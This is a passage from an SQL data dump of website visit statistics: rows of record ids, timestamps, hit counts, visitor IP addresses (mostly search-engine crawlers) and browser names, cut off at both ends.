215.100','chrome'),(5800,1456026738,1,1,0,0,'157.55.39.44','other'),(5801,1456027333,1,0,1,0,'66.249.78.151',''),(5802,1456027758,1,1,0,0,'5.255.253.53','other'),(5803,1456027925,1,0,1,0,'66.249.78.144',''),(5804,1456028112,2,2,0,0,'207.46.13.10','other'),(5805,1456028341,1,0,1,0,'66.249.78.158',''),(5806,1456028776,1,1,0,0,'141.8.132.97','other'),(5807,1456029155,1,1,0,0,'51.255.65.31','other'),(5808,1456029928,1,1,0,0,'130.193.37.27','other'),(5809,1456029931,1,1,0,0,'141.8.142.10','other'),(5810,1456029966,1,1,0,0,'207.46.13.10','other'),(5811,1456030700,1,1,0,0,'93.158.152.26','other'),(5812,1456030986,1,0,1,0,'68.180.229.232',''),(5813,1456031367,2,2,0,0,'157.55.39.118','other'),(5814,1456031452,2,2,0,0,'130.193.51.45','other'),(5815,1456031455,1,1,0,0,'130.193.51.102','other'),(5816,1456031457,2,2,0,0,'141.8.142.41','other'),(5817,1456031462,1,1,0,0,'130.193.51.81','other'),(5818,1456031465,1,1,0,0,'141.8.132.76','other'),(5819,1456031467,1,1,0,0,'141.8.183.14','other'),(5820,1456031484,1,1,0,0,'130.193.51.43','other'),(5821,1456031486,1,1,0,0,'5.255.253.10','other'),(5822,1456031489,1,1,0,0,'141.8.184.11','other'),(5823,1456032058,2,0,2,0,'68.180.229.232',''),(5824,1456032579,2,2,0,0,'207.46.13.10','other'),(5825,1456034954,2,0,2,0,'68.180.229.232',''),(5826,1456035325,1,1,0,0,'157.55.39.118','other'),(5827,1456035977,1,1,0,0,'8.29.198.26','other'),(5828,1456036380,1,1,0,0,'66.249.92.95','other'),(5829,1456036398,1,0,1,0,'66.249.66.158',''),(5830,1456037167,1,0,1,0,'68.180.229.232',''),(5831,1456037624,1,1,0,0,'207.46.13.10','other'),(5832,1456037678,1,1,0,0,'141.8.142.88','other'),(5833,1456037683,1,1,0,0,'141.8.142.8','other'),(5834,1456037686,1,1,0,0,'93.158.152.9','other'),(5835,1456037689,1,1,0,0,'5.255.253.100','other'),(5836,1456038260,1,0,1,0,'66.249.78.158',''),(5837,1456038383,1,1,0,0,'157.55.39.44','other'),(5838,1456038859,1,0,1,0,'66.249.66.166',''),(5839,1456039080,2,2,0,0,'157.55.39.118','other'),(5840,1456039520,2,0,2,0,'68.180.229.232',''),(5841,1456039707,1,1,0,0,'91.196.177.19','chrome'),(5842,1456039942,1,0,1,0,'66.249.78.151',''),(5843,1456040153,1,1,0,0,'207.46.13.10','other'),(5844,1456040449,1,0,1,0,'68.180.229.232',''),(5845,1456040783,1,1,0,0,'94.178.7.35','firefox'),(5846,1456040983,1,0,1,0,'66.249.78.144',''),(5847,1456041435,1,1,0,0,'101.226.167.213','chrome'),(5848,1456041436,1,1,0,0,'101.226.168.200','chrome'),(5849,1456041991,1,1,0,0,'5.255.253.100','other'),(5850,1456041993,1,1,0,0,'141.8.132.76','other'),(5851,1456042084,268,268,0,0,'82.193.127.15','other'),(5852,1456042322,1,1,0,0,'91.196.178.129','firefox'),(5853,1456042435,1,0,1,0,'68.180.229.232',''),(5854,1456042533,1,0,1,0,'66.249.66.166',''),(5855,1456042571,1,1,0,0,'51.255.65.29','other'),(5856,1456044027,1,0,1,0,'66.249.78.144',''),(5857,1456044110,1,1,0,0,'180.76.15.146','other'),(5858,1456044143,1,1,0,0,'180.76.15.34','other'),(5859,1456044406,1,1,0,0,'62.210.215.100','chrome'),(5860,1456044569,1,1,0,0,'51.255.65.53','other'),(5861,1456044684,1,1,0,0,'93.158.152.26','other'),(5862,1456044685,1,1,0,0,'5.255.253.9','other'),(5863,1456044949,1,0,1,0,'66.249.66.162',''),(5864,1456045039,1,0,1,0,'66.249.78.158',''),(5865,1456046269,1,0,1,0,'66.249.78.158',''),(5866,1456046460,1,1,0,0,'207.46.13.10','other'),(5867,1456046512,1,1,0,0,'157.55.39.44','other'),(5868,1456046814,1,1,0,0,'8.29.198.26','other'),(5869,1456047049,1,1,0,0,'157.55.39.118','other'),(5870,1456047071,1,1,0,0,'66.249.92.103','other'),(5871,1456047426,2,0,2,0,'68.180.229.232',''),(5872,1456047715,1,1,0,0,'74.91.26.114','firefox'),(5873,1456047758,1,1,0,0,'40.77.167.55','other'),(5874,1456048589,1,1,0,0,'207.46.13.10','other'),(5875,1456048689,1,1,0,0,'51.255.65.74','other'),(5876,1456048762,1,0,1,0,'66.249.78.151',''),(5877,1456048841,1,0,1,0,'68.180.229.232',''),(5878,1456049345,1,1,0,0,'51.255.65.68','other'),(5879,1456049690,1,0,1,0,'66.249.78.144',''),(5880,1456049825,1,0,1,0,'68.180.229.232',''),(5881,1456050528,2,2,0,0,'157.55.39.44','other'),(5882,1456050843,1,0,1,0,'66.249.78.151',''),(5883,1456051224,1,0,1,0,'68.180.229.232',''),(5884,1456051510,1,1,0,0,'51.255.65.68','other'),(5885,1456052079,1,0,1,0,'66.249.78.144',''),(5886,1456052547,1,1,0,0,'40.77.167.55','other'),(5887,1456053019,1,1,0,0,'157.55.39.118','other'),(5888,1456053024,1,1,0,0,'178.154.149.9','other'),(5889,1456053241,1,1,0,0,'178.154.189.6','other'),(5890,1456053244,1,1,0,0,'5.255.253.51','other'),(5891,1456053619,1,1,0,0,'180.76.15.10','other'),(5892,1456053975,1,1,0,0,'91.196.178.11','firefox'),(5893,1456054767,1,1,0,0,'5.255.253.100','other'),(5894,1456054769,1,1,0,0,'178.154.189.6','other'),(5895,1456055068,1,1,0,0,'180.76.15.33','other'),(5896,1456055628,1,1,0,0,'180.76.15.159','other'),(5897,1456055695,1,0,1,0,'66.249.66.158',''),(5898,1456056006,5,5,0,0,'149.202.54.6','other'),(5899,1456056220,1,0,1,0,'66.249.66.166',''),(5900,1456056281,1,1,0,0,'51.255.65.55','other'),(5901,1456056786,1,1,0,0,'157.55.39.44','other'),(5902,1456057053,1,0,1,0,'66.249.78.151',''),(5903,1456057429,2,0,2,0,'68.180.229.232',''),(5904,1456057614,1,0,1,0,'66.249.78.144',''),(5905,1456057649,1,1,0,0,'8.29.198.26','other'),(5906,1456057770,1,1,0,0,'66.249.92.103','other'),(5907,1456058511,2,2,0,0,'157.55.39.44','other'),(5908,1456059010,1,1,0,0,'130.193.51.43','other'),(5909,1456059012,1,1,0,0,'141.8.132.2','other'),(5910,1456059314,1,0,1,0,'66.249.78.151',''),(5911,1456061025,1,1,0,0,'5.255.253.10','other'),(5913,1456061228,3,0,3,0,'68.180.229.232',''),(5914,1456061795,1,0,1,0,'66.249.78.144',''),(5915,1456062307,1,1,0,0,'217.69.143.55','other'),(5916,1456062520,1,1,0,0,'176.67.29.128','chrome'),(5917,1456063260,1,1,0,0,'62.210.215.100','chrome'),(5918,1456063523,1,1,0,0,'141.8.184.18','other'),(5919,1456063576,1,1,0,0,'176.77.44.67','msie'),(5920,1456064109,1,0,1,0,'68.180.229.232',''),(5921,1456064167,1,0,1,0,'66.249.78.158',''),(5922,1456064589,2,2,0,0,'157.55.39.118','other'),(5923,1456064886,1,1,0,0,'91.196.178.37','chrome'),(5924,1456064952,1,1,0,0,'46.18.0.48','chrome'),(5925,1456065742,1,1,0,0,'141.8.184.18','other'),(5926,1456065816,1,1,0,0,'40.77.167.55','other'),(5927,1456065913,1,1,0,0,'217.69.133.30','other'),(5928,1456066110,10,10,0,0,'69.58.178.56','firefox'),(5929,1456066914,1,1,0,0,'31.129.228.3','firefox'),(5930,1456067084,1,1,0,0,'62.149.0.171','other'),(5931,1456067130,2,2,0,0,'157.55.39.118','other'),(5932,1456067241,1,1,0,0,'157.55.39.44','other'),(5933,1456067353,1,1,0,0,'93.158.152.26','other'),(5934,1456068027,1,1,0,0,'91.196.178.70','chrome'),(5935,1456068094,1,1,0,0,'62.210.215.100','chrome'),(5936,1456068302,1,1,0,0,'66.249.92.99','other'),(5937,1456068524,1,1,0,0,'8.29.198.25','other'),(5938,1456068598,1,1,0,0,'51.255.65.72','other'),(5939,1456068685,1,0,1,0,'66.249.78.158',''),(5940,1456068916,1,1,0,0,'178.154.149.11','other'),(5941,1456071026,3,0,3,0,'68.180.229.232',''),(5942,1456071286,1,0,1,0,'66.249.78.151',''),(5943,1456071522,1,1,0,0,'178.93.148.130','chrome'),(5944,1456071610,1,1,0,0,'5.248.8.168','firefox'),(5945,1456071686,1,1,0,0,'141.8.142.10','other'),(5946,1456071873,1,1,0,0,'217.69.143.50','other'),(5947,1456071905,1,1,0,0,'66.102.9.94','firefox'),(5948,1456072099,1,0,1,0,'66.249.78.144',''),(5949,1456072377,1,0,1,0,'68.180.229.232',''),(5950,1456072763,1,1,0,0,'91.196.178.8','other'),(5951,1456073316,2,0,2,0,'68.180.229.232',''),(5952,1456073386,58,58,0,0,'157.55.39.118','other'),(5953,1456073446,57,57,0,0,'40.77.167.55','other'),(5954,1456073474,49,49,0,0,'157.55.39.44','other'),(5955,1456073505,78,78,0,0,'157.55.39.196','other'),(5956,1456073562,1,1,0,0,'193.194.127.217','firefox'),(5957,1456073610,1,1,0,0,'130.193.51.81','other'),(5958,1456073675,1,1,0,0,'91.196.178.8','other'),(5959,1456073928,1,1,0,0,'125.209.235.172','other'),(5960,1456074246,1,0,1,0,'68.180.229.232',''),(5961,1456074693,1,0,1,0,'66.249.78.44',''),(5962,1456074937,1,1,0,0,'37.52.21.82','chrome'),(5963,1456075350,1,1,0,0,'5.255.253.55','other'),(5964,1456075460,1,1,0,0,'157.55.39.118','other'),(5965,1456076054,1,0,1,0,'68.180.229.232',''),(5966,1456076320,1,1,0,0,'80.73.1.193','opera'),(5967,1456076358,1,1,0,0,'51.255.65.84','other'),(5968,1456076562,2,2,0,0,'70.35.202.197','firefox'),(5969,1456076567,2,2,0,0,'70.35.202.197','other'),(5970,1456078041,1,1,0,0,'180.76.15.141','other'),(5971,1456078139,1,0,1,0,'68.180.229.232',''),(5972,1456078381,1,1,0,0,'51.255.65.57','other'),(5973,1456079350,1,1,0,0,'66.249.92.99','other'),(5974,1456079399,1,1,0,0,'8.29.198.25','other'),(5975,1456081226,1,0,1,0,'66.249.66.162',''),(5976,1456081487,1,1,0,0,'207.46.13.192','other'),(5977,1456081991,2,0,2,0,'68.180.229.232',''),(5978,1456082059,1,1,0,0,'180.76.15.30','other'),(5979,1456083266,1,0,1,0,'66.249.78.144',''),(5980,1456083413,98,98,0,0,'69.30.213.18','other'),(5981,1456083812,152,152,0,0,'109.87.138.56','other'),(5982,1456083841,3,3,0,0,'80.91.162.99','other'),(5983,1456084031,1,1,0,0,'178.95.137.248','chrome'),(5984,1456084438,1,1,0,0,'94.178.7.35','firefox'),(5985,1456084753,1,1,0,0,'212.83.177.193','other'),(5986,1456085661,1,0,1,0,'66.249.78.151',''),(5987,1456085961,1,0,1,0,'66.249.66.166',''),(5988,1456086358,1,1,0,0,'40.77.167.55','other'),(5989,1456086479,1,0,1,0,'68.180.229.232',''),(5990,1456086937,1,0,1,0,'66.249.66.166',''),(5991,1456086955,4,4,0,0,'82.193.127.15','other'),(5992,1456086957,1,1,0,0,'62.210.215.100','chrome'),(5993,1456087814,3,3,0,0,'136.243.103.157','other'),(5994,1456087819,4,4,0,0,'162.210.196.130','other'),(5995,1456088233,1,0,1,0,'66.249.78.158',''),(5996,1456088337,1,1,0,0,'149.202.48.207','other'),(5997,1456088600,1,0,1,0,'66.249.78.144',''),(5998,1456088671,1,1,0,0,'66.249.81.205','other'),(5999,1456088701,1,1,0,0,'207.46.13.192','other'),(6000,1456090020,1,1,0,0,'130.193.51.85','other'),(6001,1456090227,1,1,0,0,'8.29.198.25','other'),(6002,1456090380,1,1,0,0,'66.249.92.103','other'),(6003,1456091357,1,1,0,0,'91.196.178.33','chrome'),(6004,1456091756,2,2,0,0,'40.77.167.55','other'),(6005,1456091759,1,1,0,0,'51.255.65.90','other'),(6006,1456092310,1,1,0,0,'66.249.81.205','other'),(6007,1456093377,1,0,1,0,'68.180.229.232',''),(6008,1456093683,2,2,0,0,'173.234.159.250','other'),(6009,1456093908,2,2,0,0,'82.193.127.15','other'),(6010,1456094136,1,0,1,0,'66.249.78.151',''),(6011,1456094359,1,1,0,0,'93.158.152.26','other'),(6012,1456094605,1,1,0,0,'141.8.184.18','other'),(6013,1456094683,1,0,1,0,'66.249.78.158',''),(6014,1456095072,2,0,2,0,'68.180.229.232',''),(6015,1456095916,1,1,0,0,'66.249.81.211','other'),(6016,1456095985,1,1,0,0,'217.69.143.61','other'),(6017,1456096432,1,1,0,0,'178.154.189.204','other'),(6018,1456096855,1,1,0,0,'40.77.167.55','other'),(6019,1456096927,1,1,0,0,'141.8.184.11','other'),(6020,1456097232,1,1,0,0,'207.46.13.192','other'),(6021,1456097339,1,1,0,0,'5.255.253.10','other'),(6022,1456097341,1,1,0,0,'130.193.37.27','other'),(6023,1456097342,1,1,0,0,'141.8.132.48','other'),(6024,1456097345,1,1,0,0,'93.158.152.65','other'),(6025,1456097678,1,1,0,0,'141.8.142.10','other'),(6026,1456097742,1,0,1,0,'68.180.229.232',''),(6027,1456098165,1,1,0,0,'51.255.65.14','other'),(6028,1456098478,1,0,1,0,'66.249.78.144',''),(6029,1456098607,2,2,0,0,'5.255.253.89','other'),(6030,1456098611,5,5,0,0,'93.158.152.26','other'),(6031,1456098795,9,9,0,0,'141.8.142.41','other'),(6032,1456098798,7,7,0,0,'130.193.51.102','other'),(6034,1456098799,5,5,0,0,'141.8.184.18','other'),(6035,1456098800,8,8,0,0,'130.193.37.21','other'),(6036,1456098802,8,8,0,0,'141.8.142.88','other'),(6037,1456098803,5,5,0,0,'141.8.132.79','other'),(6038,1456098805,8,8,0,0,'130.193.51.43','other'),(6039,1456098807,6,6,0,0,'5.255.253.110','other'),(6040,1456098809,5,5,0,0,'141.8.132.2','other'),(6041,1456098810,8,8,0,0,'5.255.253.9','other'),(6042,1456098811,6,6,0,0,'5.255.253.30','other'),(6043,1456098812,7,7,0,0,'130.193.51.85','other'),(6044,1456098813,4,4,0,0,'130.193.51.45','other'),(6045,1456098816,7,7,0,0,'130.193.37.27','other'),(6046,1456098817,9,9,0,0,'93.158.152.9','other'),(6047,1456098821,4,4,0,0,'178.154.149.11','other'),(6048,1456098822,7,7,0,0,'5.255.253.100','other'),(6050,1456098828,4,4,0,0,'5.255.253.55','other'),(6051,1456098829,1,1,0,0,'5.255.253.103','other'),(6052,1456098836,2,2,0,0,'141.8.184.22','other'),(6053,1456098840,2,2,0,0,'178.154.149.9','other'),(6054,1456098845,4,4,0,0,'141.8.132.76','other'),(6055,1456098847,3,3,0,0,'141.8.132.99','other'),(6056,1456098848,5,5,0,0,'141.8.142.10','other'),(6057,1456098853,1,1,0,0,'141.8.184.31','other'),(6058,1456098861,4,4,0,0,'141.8.184.11','other'),(6059,1456098866,3,3,0,0,'141.8.132.97','other'),(6060,1456098874,2,2,0,0,'5.255.253.94','other'),(6061,1456098877,3,3,0,0,'141.8.142.8','other'),(6062,1456098881,4,4,0,0,'141.8.183.14','other'),(6063,1456098886,3,3,0,0,'5.255.253.53','other'),(6064,1456098889,1,1,0,0,'141.8.132.44','other'),(6065,1456098896,3,3,0,0,'130.193.51.81','other'),(6066,1456098898,1,1,0,0,'141.8.142.82','other'),(6067,1456098908,3,3,0,0,'5.255.253.10','other'),(6068,1456098909,2,2,0,0,'130.193.50.22','other'),(6069,1456099079,1,0,1,0,'68.180.229.232',''),(6070,1456099115,1,1,0,0,'130.193.51.50','other'),(6071,1456099143,2,2,0,0,'5.255.253.17','other'),(6072,1456099445,1,1,0,0,'207.46.13.192','other'),(6073,1456099755,1,1,0,0,'178.154.189.200','other'),(6074,1456099756,1,1,0,0,'93.158.152.110','chrome'),(6076,1456099798,11,11,0,0,'93.158.152.9','other'),(6077,1456099799,11,11,0,0,'178.154.149.11','other'),(6078,1456099800,13,13,0,0,'130.193.37.21','other'),(6079,1456099801,4,4,0,0,'5.255.253.100','other'),(6080,1456099861,1,0,1,0,'66.249.78.158',''),(6081,1456099884,13,13,0,0,'141.8.184.18','other'),(6082,1456100082,22,22,0,0,'141.8.183.14','other'),(6083,1456100083,10,10,0,0,'141.8.132.99','other'),(6084,1456100133,9,9,0,0,'5.255.253.53','other'),(6085,1456100666,3,3,0,0,'141.8.142.88','other'),(6087,1456100669,2,2,0,0,'5.255.253.9','other'),(6088,1456100670,1,1,0,0,'5.255.253.110','other'),(6089,1456100673,3,3,0,0,'5.255.253.10','other'),(6091,1456100676,1,1,0,0,'141.8.132.79','other'),(6092,1456100677,2,2,0,0,'141.8.184.11','other'),(6093,1456100681,1,1,0,0,'141.8.132.2','other'),(6094,1456100683,1,1,0,0,'5.255.253.30','other'),(6095,1456100687,1,1,0,0,'141.8.184.22','other'),(6097,1456100751,1,1,0,0,'66.249.92.95','other'),(6098,1456100780,1,1,0,0,'130.193.50.31','other'),(6099,1456100782,1,1,0,0,'130.193.51.7','other'),(6100,1456100846,1,1,0,0,'207.46.13.192','other'),(6101,1456100879,1,1,0,0,'130.193.37.27','other'),(6102,1456100880,1,1,0,0,'5.255.253.89','other'),(6103,1456100888,2,2,0,0,'130.193.51.102','other'),(6104,1456100962,1,1,0,0,'141.8.142.82','other'),(6105,1456100963,1,1,0,0,'130.193.51.81','other'),(6106,1456100968,13,13,0,0,'178.154.149.11','other'),(6107,1456100970,9,9,0,0,'93.158.152.9','other'),(6108,1456100971,12,12,0,0,'141.8.184.18','other'),(6109,1456100974,1,1,0,0,'5.255.253.100','other'),(6110,1456100981,2,2,0,0,'130.193.51.45','other'),(6111,1456100986,4,4,0,0,'141.8.183.14','other'),(6112,1456101007,10,10,0,0,'173.234.159.250','other'),(6113,1456101049,1,1,0,0,'8.29.198.26','other'),(6114,1456101063,2,2,0,0,'141.8.132.99','other'),(6115,1456101065,10,10,0,0,'5.255.253.53','other'),(6116,1456101070,3,3,0,0,'130.193.51.109','other'),(6117,1456101074,1,1,0,0,'130.193.51.85','other'),(6118,1456101079,1,1,0,0,'141.8.142.8','other'),(6119,1456101881,4,4,0,0,'141.8.184.18','other'),(6120,1456101961,8,8,0,0,'178.154.149.11','other'),(6121,1456101962,7,7,0,0,'141.8.183.14','other'),(6122,1456101971,1,1,0,0,'62.210.215.100','chrome'),(6123,1456102058,1,1,0,0,'93.158.152.26','other'),(6124,1456102060,1,1,0,0,'5.255.253.30','other'),(6125,1456102063,1,1,0,0,'217.69.143.67','other'),(6126,1456102064,8,8,0,0,'5.255.253.53','other'),(6127,1456102168,7,7,0,0,'93.158.152.9','other'),(6128,1456102246,8,8,0,0,'130.193.37.21','other'),(6129,1456102249,2,2,0,0,'141.8.132.99','other'),(6130,1456102505,1,0,1,0,'66.249.78.144',''),(6131,1456102893,15,15,0,0,'141.8.184.18','other'),(6132,1456102994,12,12,0,0,'178.154.149.11','other'),(6133,1456103001,12,12,0,0,'141.8.183.14','other'),(6134,1456103186,6,6,0,0,'130.193.37.21','other'),(6135,1456103353,12,12,0,0,'93.158.152.9','other'),(6136,1456103355,6,6,0,0,'5.255.253.53','other'),(6137,1456103470,4,4,0,0,'141.8.132.99','other'),(6138,1456103538,1,1,0,0,'5.255.253.89','other'),(6139,1456103539,1,1,0,0,'130.193.50.31','other'),(6140,1456103540,1,1,0,0,'141.8.132.2','other'),(6141,1456103541,2,2,0,0,'141.8.184.22','other'),(6142,1456103542,1,1,0,0,'5.255.253.110','other'),(6143,1456103544,1,1,0,0,'5.255.253.9','other'),(6144,1456103548,1,1,0,0,'5.255.253.100','other'),(6145,1456103549,1,1,0,0,'141.8.184.11','other'),(6146,1456103550,1,1,0,0,'130.193.51.102','other'),(6147,1456103551,1,1,0,0,'5.255.253.55','other'),(6148,1456103552,1,1,0,0,'130.193.37.27','other'),(6149,1456103557,1,1,0,0,'51.255.65.12','other'),(6150,1456103585,1,1,0,0,'62.210.215.100','chrome'),(6151,1456103762,1,0,1,0,'68.180.229.232',''),(6152,1456103879,6,6,0,0,'141.8.184.18','other'),(6153,1456103923,4,4,0,0,'141.8.183.14','other'),(6155,1456103971,8,8,0,0,'178.154.149.11','other'),(6156,1456104024,1,0,1,0,'66.249.78.158',''),(6157,1456104026,1,1,0,0,'77.247.181.162','chrome'),(6158,1456104385,6,6,0,0,'130.193.37.21','other'),(6159,1456104433,6,6,0,0,'93.158.152.9','other'),(6160,1456104541,4,4,0,0,'5.255.253.53','other'),(6161,1456104553,4,4,0,0,'141.8.132.99','other'),(6162,1456104610,1,0,1,0,'66.249.66.162',''),(6163,1456105249,12,12,0,0,'141.8.184.18','other'),(6164,1456105655,22,22,0,0,'93.158.152.9','other'),(6165,1456105658,18,18,0,0,'178.154.149.11','other'),(6166,1456105721,12,12,0,0,'5.255.253.53','other'),(6167,1456105857,12,12,0,0,'141.8.183.14','other'),(6168,1456106088,3,3,0,0,'130.193.37.21','other'),(6169,1456106264,1,1,0,0,'141.8.132.99','other'),(6170,1456106265,8,8,0,0,'141.8.184.18','other'),(6171,1456106311,1,0,1,0,'66.249.78.158',''),(6172,1456106750,1,0,1,0,'68.180.229.232',''),(6173,1456107667,1,0,1,0,'66.249.78.158',''),(6174,1456107681,1,1,0,0,'51.255.65.80','other'),(6175,1456107927,1,1,0,0,'51.255.65.65','other'),(6176,1456107968,1,1,0,0,'180.76.15.136','other'),(6177,1456108021,8,8,0,0,'141.8.184.18','other'),(6178,1456108022,7,7,0,0,'178.154.149.11','other'),(6179,1456108023,2,2,0,0,'141.8.183.14','other'),(6180,1456108161,1,1,0,0,'51.255.65.85','other'),(6181,1456108522,1,1,0,0,'217.69.133.21','other'),(6182,1456108960,1,1,0,0,'157.55.39.118','other'),(6183,1456108978,1,0,1,0,'68.180.229.232',''),(6184,1456109314,2,2,0,0,'141.8.184.18','other'),(6185,1456109318,1,1,0,0,'178.154.149.11','other'),(6186,1456109977,1,1,0,0,'180.76.15.17','other'),(6187,1456110228,1,1,0,0,'157.55.39.118','other'),(6188,1456110230,5,5,0,0,'178.154.149.11','other'),(6189,1456110231,6,6,0,0,'93.158.152.9','other'),(6190,1456110233,3,3,0,0,'141.8.183.14','other'),(6191,1456110238,2,2,0,0,'5.255.253.53','other'),(6192,1456110272,74,74,0,0,'80.91.162.99','other'),(6193,1456110279,1,1,0,0,'207.46.13.192','other'),(6194,1456110307,1,1,0,0,'40.77.167.55','other'),(6195,1456110518,1,1,0,0,'141.8.184.22','other'),(6196,1456110519,1,1,0,0,'5.255.253.30','other'),(6197,1456110525,2,2,0,0,'141.8.184.18','other'),(6198,1456110527,1,1,0,0,'141.8.132.99','other'),(6199,1456110530,1,1,0,0,'130.193.37.21','other'),(6200,1456110728,1,0,1,0,'68.180.229.232',''),(6201,1456110915,1,0,1,0,'66.249.66.158',''),(6202,1456111523,1,1,0,0,'66.249.92.95','other'),(6203,1456111626,1,1,0,0,'40.77.167.55','other'),(6204,1456111835,2,2,0,0,'94.154.233.132','other'),(6205,1456111875,1,1,0,0,'8.29.198.26','other'),(6206,1456112212,5,5,0,0,'141.8.184.18','other'),(6207,1456112213,4,4,0,0,'141.8.183.14','other'),(6209,1456112214,5,5,0,0,'5.255.253.53','other'),(6210,1456112265,1,0,1,0,'68.180.229.232',''),(6211,1456112316,1,1,0,0,'130.193.37.21','other'),(6212,1456112320,2,2,0,0,'178.154.149.11','other'),(6213,1456112363,1,0,1,0,'66.249.78.158',''),(6214,1456112588,2,2,0,0,'157.55.39.196','other'),(6215,1456112673,1,1,0,0,'40.77.167.55','other'),(6216,1456112847,1,0,1,0,'66.249.78.151',''),(6217,1456113464,4,4,0,0,'141.8.184.18','other'),(6218,1456113465,4,4,0,0,'141.8.183.14','other'),(6219,1456113466,2,2,0,0,'130.193.37.21','other'),(6220,1456113467,1,1,0,0,'93.158.152.9','other'),(6221,1456113468,1,1,0,0,'178.154.149.11','other'),(6222,1456113469,5,5,0,0,'5.255.253.53','other'),(6223,1456114455,1,0,1,0,'66.249.78.158',''),(6224,1456114774,1,0,1,0,'66.249.78.151',''),(6225,1456114874,1,0,1,0,'68.180.229.232',''),(6226,1456115177,9,9,0,0,'157.55.39.196','other'),(6227,1456115195,6,6,0,0,'40.77.167.55','other'),(6228,1456115203,12,12,0,0,'207.46.13.192','other'),(6229,1456115555,1,1,0,0,'130.193.51.91','other'),(6230,1456115556,1,1,0,0,'141.8.184.18','other'),(6231,1456115558,1,1,0,0,'130.193.51.81','other'),(6232,1456115559,1,1,0,0,'141.8.142.10','other'),(6233,1456116230,1,1,0,0,'94.179.5.164','chrome'),(6234,1456116262,1,0,1,0,'66.249.66.166',''),(6235,1456116518,1,0,1,0,'66.249.78.151',''),(6236,1456116902,2,0,2,0,'66.249.78.158',''),(6237,1456117058,1,1,0,0,'40.77.167.55','other'),(6238,1456117987,1,1,0,0,'141.8.132.2','other'),(6239,1456118123,1,1,0,0,'141.8.183.14','other'),(6240,1456118124,1,1,0,0,'93.158.152.9','other'),(6241,1456118485,1,1,0,0,'130.193.51.81','other'),(6242,1456119801,1,1,0,0,'62.210.215.100','chrome'),(6243,1456121664,2,2,0,0,'157.55.39.196','other'),(6244,1456122733,1,1,0,0,'8.29.198.25','other'),(6245,1456122824,1,1,0,0,'66.249.92.103','other'),(6246,1456122910,2,0,2,0,'66.249.78.158',''),(6247,1456122997,1,1,0,0,'91.196.178.16','chrome'),(6248,1456123246,1,1,0,0,'66.249.93.90','firefox'),(6249,1456123564,1,1,0,0,'40.77.167.55','other'),(6250,1456123598,1,1,0,0,'178.95.137.248','chrome'),(6251,1456123725,2,2,0,0,'130.193.51.7','other'),(6252,1456123726,1,1,0,0,'93.158.152.9','other'),(6253,1456123728,2,2,0,0,'5.255.253.94','other'),(6254,1456123730,2,2,0,0,'93.158.152.26','other'),(6255,1456123732,1,1,0,0,'130.193.51.81','other'),(6256,1456123733,1,1,0,0,'141.8.184.22','other'),(6258,1456123735,1,1,0,0,'141.8.142.88','other'),(6259,1456123736,1,1,0,0,'130.193.51.50','other'),(6261,1456123737,1,1,0,0,'178.154.149.9','other'),(6262,1456123738,1,1,0,0,'93.158.152.81','other'),(6263,1456123740,1,1,0,0,'130.193.51.91','other'),(6264,1456123741,1,1,0,0,'178.154.189.6','other'),(6265,1456123742,1,1,0,0,'5.255.253.51','other'),(6266,1456123743,1,1,0,0,'141.8.132.109','other'),(6267,1456123744,1,1,0,0,'141.8.184.31','other'),(6268,1456123745,1,1,0,0,'5.255.253.100','other'),(6269,1456123746,1,1,0,0,'130.193.51.43','other'),(6270,1456123875,1,1,0,0,'141.8.132.97','other'),(6272,1456124146,1,0,1,0,'66.249.78.158',''),(6273,1456125169,1,1,0,0,'178.154.189.6','other'),(6274,1456125173,1,1,0,0,'141.8.142.55','other'),(6275,1456125178,1,1,0,0,'141.8.132.44','other'),(6276,1456125182,1,1,0,0,'5.255.253.103','other'),(6277,1456125186,1,1,0,0,'178.154.189.12','other'),(6278,1456125191,1,1,0,0,'130.193.51.55','other'),(6279,1456125195,1,1,0,0,'130.193.51.109','other'),(6280,1456125199,1,1,0,0,'141.8.132.48','other'),(6281,1456125203,1,1,0,0,'130.193.51.50','other'),(6282,1456125207,1,1,0,0,'130.193.37.27','other'),(6283,1456125212,1,1,0,0,'141.8.183.14','other'),(6284,1456125216,1,1,0,0,'5.255.253.100','other'),(6285,1456125220,1,1,0,0,'141.8.132.2','other'),(6286,1456125224,1,1,0,0,'141.8.184.11','other'),(6287,1456125228,2,2,0,0,'141.8.132.97','other'),(6288,1456125233,1,1,0,0,'141.8.132.79','other'),(6289,1456125237,1,1,0,0,'5.255.253.53','other'),(6290,1456125241,1,1,0,0,'130.193.51.43','other'),(6291,1456125245,1,1,0,0,'141.8.142.10','other'),(6292,1456125254,1,1,0,0,'5.255.253.55','other'),(6293,1456125352,1,1,0,0,'207.46.13.127','other'),(6294,1456125360,1,1,0,0,'91.196.178.72','firefox'),(6295,1456125523,1,1,0,0,'66.102.9.84','firefox'),(6296,1456125763,1,1,0,0,'78.111.185.172','firefox'),(6297,1456126064,1,1,0,0,'66.249.81.211','other'),(6298,1456126827,1,0,1,0,'68.180.229.232',''),(6299,1456126991,1,1,0,0,'80.91.162.99','other'),(6300,1456127003,1,1,0,0,'157.55.39.100','other'),(6301,1456127252,1,1,0,0,'91.196.178.72','firefox'),(6302,1456127294,1,1,0,0,'91.196.178.68','firefox'),(6303,1456127392,1,1,0,0,'213.108.45.138','firefox'),(6304,1456128515,1,0,1,0,'66.249.78.144',''),(6305,1456128741,1,1,0,0,'91.196.178.68','chrome'),(6306,1456129010,2,2,0,0,'91.196.178.168','chrome'),(6307,1456129223,6,6,0,0,'178.88.58.220','firefox'),(6308,1456129251,1,1,0,0,'185.84.148.4','msie'),(6309,1456129269,1,1,0,0,'91.196.178.72','firefox'),(6310,1456129435,1,1,0,0,'130.193.51.50','other'),(6311,1456129439,1,1,0,0,'130.193.50.31','other'),(6312,1456129443,1,1,0,0,'93.158.152.9','other'),(6313,1456129448,1,1,0,0,'130.193.37.21','other'),(6314,1456129452,1,1,0,0,'141.8.184.11','other'),(6315,1456129624,1,0,1,0,'68.180.229.232',''),(6316,1456129771,1,1,0,0,'66.249.81.205','other'),(6317,1456130153,1,1,0,0,'5.255.253.62','other'),(6318,1456130157,1,1,0,0,'141.8.132.97','other'),(6319,1456130161,1,1,0,0,'178.154.189.12','other'),(6320,1456130166,1,1,0,0,'5.255.253.30','other'),(6321,1456130170,1,1,0,0,'141.8.132.74','other'),(6322,1456130674,1,1,0,0,'207.46.13.127','other'),(6323,1456130816,1,1,0,0,'217.69.143.66','other'),(6324,1456131170,1,0,1,0,'66.249.78.158',''),(6325,1456131567,1,0,1,0,'68.180.229.232',''),(6326,1456131794,2,2,0,0,'207.46.13.127','other'),(6327,1456131853,1,1,0,0,'194.187.106.118','chrome'),(6328,1456131932,1,1,0,0,'91.196.17